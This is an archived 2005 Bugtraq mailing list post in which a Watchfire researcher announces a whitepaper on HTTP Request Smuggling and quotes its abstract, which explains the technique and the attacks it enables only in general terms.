Bugtraq mailing list archives
A new whitepaper by Watchfire - HTTP Request Smuggling
From: Ory Segal <orysegal () netvision net il>
Date: Mon, 06 Jun 2005 19:09:04 +0300
Ory Segal wrote:
Hello,Today, Watchfire released a new whitepaper, titled "HTTP Request Smuggling". The full paper can be found in the following link: http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf <BLOCKED::http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf>The paper's abstract is copied below:"We describe a new web entity attack technique – “HTTP Request Smuggling”. The attack technique and the derived attacks are relevant to most web environments and is the result of a HTTP server or device’s failure to properly handle malformed inbound HTTP requests. HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. Cache Server, Proxy Server, Web Application Firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks – web cache poisoning, session hijacking, cross-site scripting and most serious the ability to bypass web application firewall protection. HTTP Request Smuggling sends multiple specially-crafted HTTP requests that cause the two attacked entities to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it. In the Web Cache poisoning attack, this smuggled request will trick the cache server into unintendedly associating a URL to another URL’s page (content), and caching this content for the URL. In the Web Application Firewall attack the smuggled request could be a worm (like Nimda or Code Red) or buffer overflow attack targeting the web server. Finally, because HTTP Request Smuggling enables the attacker to insert or sneak a request into the flow it allows the attacker to manipulate the web server’s request/response sequencing which can allow for credential hijacking and other malicious outcomes."Thank you, *Ory Segal */Director of Security Research/ Watchfire (Israel) LTD. Tel: +972-9-9586077, Ext.236 Mobile: +972-54-7739359 e-mail: osegal <BLOCKED::mailto:osegal () watchfire com> at watchfire.com
Current thread:
- A new whitepaper by Watchfire - HTTP Request Smuggling Ory Segal (Jun 06)